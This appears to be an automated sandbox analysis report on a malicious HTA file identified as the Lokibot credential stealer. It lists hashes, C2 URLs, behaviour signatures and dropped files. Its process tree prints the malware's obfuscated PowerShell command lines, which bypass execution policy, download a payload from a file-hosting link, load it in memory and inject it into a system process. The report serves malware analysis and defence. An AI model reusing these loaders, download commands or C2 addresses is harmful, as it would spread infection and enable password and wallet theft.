Analysis

  • max time kernel
    143s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-10-2024 09:17

General

  • Target

    creatednewthingsformee.hta

  • Size

    205KB

  • MD5

    0b94188f0fe1baed9f97e0a69806b6e9

  • SHA1

    65a871c11c36799a747b8b40154130415f6e6f84

  • SHA256

    5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f

  • SHA512

    ad87371d82d5887377cc5882111f26849c6783427bf15c2fe235ca7570898d8937032e445e377acfe6d495ba01a0cad558fd0a3ecb23152b177ef5708639b75a

  • SSDEEP

    96:43F975adf4WbLdfSWbmx0JnfXdfmdfvUWbEdfAQ:43F15Of4GRfSGmx0J1fqfvUGAfAQ

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
    exe.dropper: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

  • Family
    lokibot
  • C2
    http://94.156.177.220/simple/five/fre.php
    http://kbfvzoboss.bid/alien/fre.php
    http://alphastand.trade/alien/fre.php
    http://alphastand.win/alien/fre.php
    http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a password and cryptocurrency wallet stealer.

  • Lokibot family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with the display window hidden.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatednewthingsformee.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
      "C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'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'+[cHar]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4348
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3260
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4148
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED3E.tmp" "c:\Users\Admin\AppData\Local\Temp\iyodhvgw\CSCE0AA58A9C33943A698AE4C6BF124EBD.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1504
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:792
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2656
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              6⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:3624

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwErshEll.ExE.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    c05bfcec8659824d2e1b0707ff338249

    SHA1

    a6336201334da17c9444e026ffbc839f99d2269c

    SHA256

    8573d294a1777ac882dd7feca947c5ca81206f43d6a29831072ce7702515e3c7

    SHA512

    513e1a94c018e8a7bed8031459fd4623902211f68a77be3fbcb1268c9474878ad4daa39f1ec339404fe83eeac16fb6c0a742e59646ab23b6eb0b8f0b3c3ed65a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    8c48f9aa3c78d58172f3893ed3b85cf1

    SHA1

    58bb96b82329a320736bbe43d5604de73b431402

    SHA256

    42ad0a225f1559eee7ea9266e3c55c1f48e6f1f4861b08149344d9b751804fb6

    SHA512

    ce51c459dd28e2b10c62bd9fddc7eb706280bff0933231638256fae8e1839226c1ff79755c667b635d2d972a990d9137b4346dc7ff47be5f935f62d071bb88a6

  • C:\Users\Admin\AppData\Local\Temp\RESED3E.tmp

    Filesize

    1KB

    MD5

    fd3212a26bad4c51013b3563695e261a

    SHA1

    7fcd658c6c56cd29bf7e7a4067ac0d963db794eb

    SHA256

    4c7efe63de94fbc88ca47b941a67952e0d6f1995706e7f01c223fe3b110841d1

    SHA512

    a935bf32648ddc0308195a5564f084a55c8652138f504d657508bd57a81448894f8612c132e7be813639d4862628c971bb4577dc507f4ab6cfe75a5c8ca65fbd

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbtbyfr5.hmi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.dll

    Filesize

    3KB

    MD5

    ed27133586c682be2cab624fb5f6b174

    SHA1

    ec541e16b5ee4d0fed44e589590c0dbdd9be4638

    SHA256

    3b5f7dc9a14af88ceaa346a7a96a34c59e37de44c76582d23198099b9a9f3769

    SHA512

    59feb93d996d6c0f01bd0852d55d8322b86d9a641f6f6e9d2dec7a35c575ee27b14215ad969997c04dd32d5a429fe95ef99bdcb425f561672ecfe535dc5e921e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4050598569-1597076380-177084960-1000\0f5007522459c86e95ffcc62f32308f1_cca0d105-8260-4611-8c12-bd85a7208b9f

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4050598569-1597076380-177084960-1000\0f5007522459c86e95ffcc62f32308f1_cca0d105-8260-4611-8c12-bd85a7208b9f

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

    Filesize

    137KB

    MD5

    4dd3d6eed0e1ade77fde299848078ef8

    SHA1

    75855bee75c0c52d00cad1897c381ffc6c706200

    SHA256

    9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305

    SHA512

    3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

  • \??\c:\Users\Admin\AppData\Local\Temp\iyodhvgw\CSCE0AA58A9C33943A698AE4C6BF124EBD.TMP

    Filesize

    652B

    MD5

    91fa68060f6b4a6e829cd3fb05a17ad1

    SHA1

    9990e4ff187f312b62dd192a957c651028690727

    SHA256

    420c6d3efaff9ec3fef63566ff0fd8725d39ca1d9d5f82ccccb27bc7c9321b99

    SHA512

    68f5508bc1c0b5a1a8acebd98a6f1ae7bf833a5227294cc137e0adf64147d5702325495a015fc35e64db6edd38195dd6b083aacae03bfe1591870872a88cb386

  • \??\c:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.0.cs

    Filesize

    487B

    MD5

    9b8f2dee116254910197a8801c205862

    SHA1

    c4fddb1f937921b75c5c988cdb3f459faa446d52

    SHA256

    5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3

    SHA512

    00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

  • \??\c:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.cmdline

    Filesize

    369B

    MD5

    3a66066869441052b351520dd6280b12

    SHA1

    8b9423a7b6f4278c1f8b1f128c3d9e62a21b06b6

    SHA256

    019fbd085501902987ca21fdf49b1025c7cdd8578885e7cb3bc76838c9f1569f

    SHA512

    85bf7060cae472e6da803584a4fddbd4e2e73e342768ce7450070c7c657aa92ed40f95954721424f62de70db483947a246e6c0c4f1ebaa687b5f4889140515e5

  • memory/1048-88-0x0000000005D40000-0x0000000006094000-memory.dmp

    Filesize

    3.3MB

  • memory/2656-104-0x0000000008070000-0x000000000810C000-memory.dmp

    Filesize

    624KB

  • memory/2656-103-0x0000000007F10000-0x000000000806A000-memory.dmp

    Filesize

    1.4MB

  • memory/3260-29-0x0000000006AC0000-0x0000000006AF2000-memory.dmp

    Filesize

    200KB

  • memory/3260-40-0x0000000006040000-0x000000000605E000-memory.dmp

    Filesize

    120KB

  • memory/3260-43-0x0000000006E10000-0x0000000006E2A000-memory.dmp

    Filesize

    104KB

  • memory/3260-44-0x0000000006E70000-0x0000000006E7A000-memory.dmp

    Filesize

    40KB

  • memory/3260-45-0x00000000070A0000-0x0000000007136000-memory.dmp

    Filesize

    600KB

  • memory/3260-30-0x000000006D620000-0x000000006D66C000-memory.dmp

    Filesize

    304KB

  • memory/3260-42-0x0000000007450000-0x0000000007ACA000-memory.dmp

    Filesize

    6.5MB

  • memory/3260-48-0x0000000007010000-0x0000000007021000-memory.dmp

    Filesize

    68KB

  • memory/3260-49-0x0000000007040000-0x000000000704E000-memory.dmp

    Filesize

    56KB

  • memory/3260-50-0x0000000007050000-0x0000000007064000-memory.dmp

    Filesize

    80KB

  • memory/3260-51-0x0000000007160000-0x000000000717A000-memory.dmp

    Filesize

    104KB

  • memory/3260-52-0x0000000007090000-0x0000000007098000-memory.dmp

    Filesize

    32KB

  • memory/3260-41-0x0000000006B00000-0x0000000006BA3000-memory.dmp

    Filesize

    652KB

  • memory/3624-130-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3624-138-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3624-106-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3624-105-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4348-67-0x0000000006EE0000-0x0000000006EE8000-memory.dmp

    Filesize

    32KB

  • memory/4348-4-0x0000000070D60000-0x0000000071510000-memory.dmp

    Filesize

    7.7MB

  • memory/4348-74-0x0000000008BE0000-0x0000000009184000-memory.dmp

    Filesize

    5.6MB

  • memory/4348-18-0x0000000006930000-0x000000000694E000-memory.dmp

    Filesize

    120KB

  • memory/4348-17-0x0000000006480000-0x00000000067D4000-memory.dmp

    Filesize

    3.3MB

  • memory/4348-16-0x00000000062C0000-0x0000000006326000-memory.dmp

    Filesize

    408KB

  • memory/4348-81-0x0000000070D60000-0x0000000071510000-memory.dmp

    Filesize

    7.7MB

  • memory/4348-6-0x0000000006250000-0x00000000062B6000-memory.dmp

    Filesize

    408KB

  • memory/4348-5-0x00000000061B0000-0x00000000061D2000-memory.dmp

    Filesize

    136KB

  • memory/4348-73-0x0000000007CF0000-0x0000000007D12000-memory.dmp

    Filesize

    136KB

  • memory/4348-19-0x00000000069D0000-0x0000000006A1C000-memory.dmp

    Filesize

    304KB

  • memory/4348-0-0x0000000070D6E000-0x0000000070D6F000-memory.dmp

    Filesize

    4KB

  • memory/4348-3-0x0000000005A40000-0x0000000006068000-memory.dmp

    Filesize

    6.2MB

  • memory/4348-2-0x0000000070D60000-0x0000000071510000-memory.dmp

    Filesize

    7.7MB

  • memory/4348-1-0x0000000005360000-0x0000000005396000-memory.dmp

    Filesize

    216KB

  • memory/4348-47-0x0000000070D60000-0x0000000071510000-memory.dmp

    Filesize

    7.7MB

  • memory/4348-46-0x0000000070D6E000-0x0000000070D6F000-memory.dmp

    Filesize

    4KB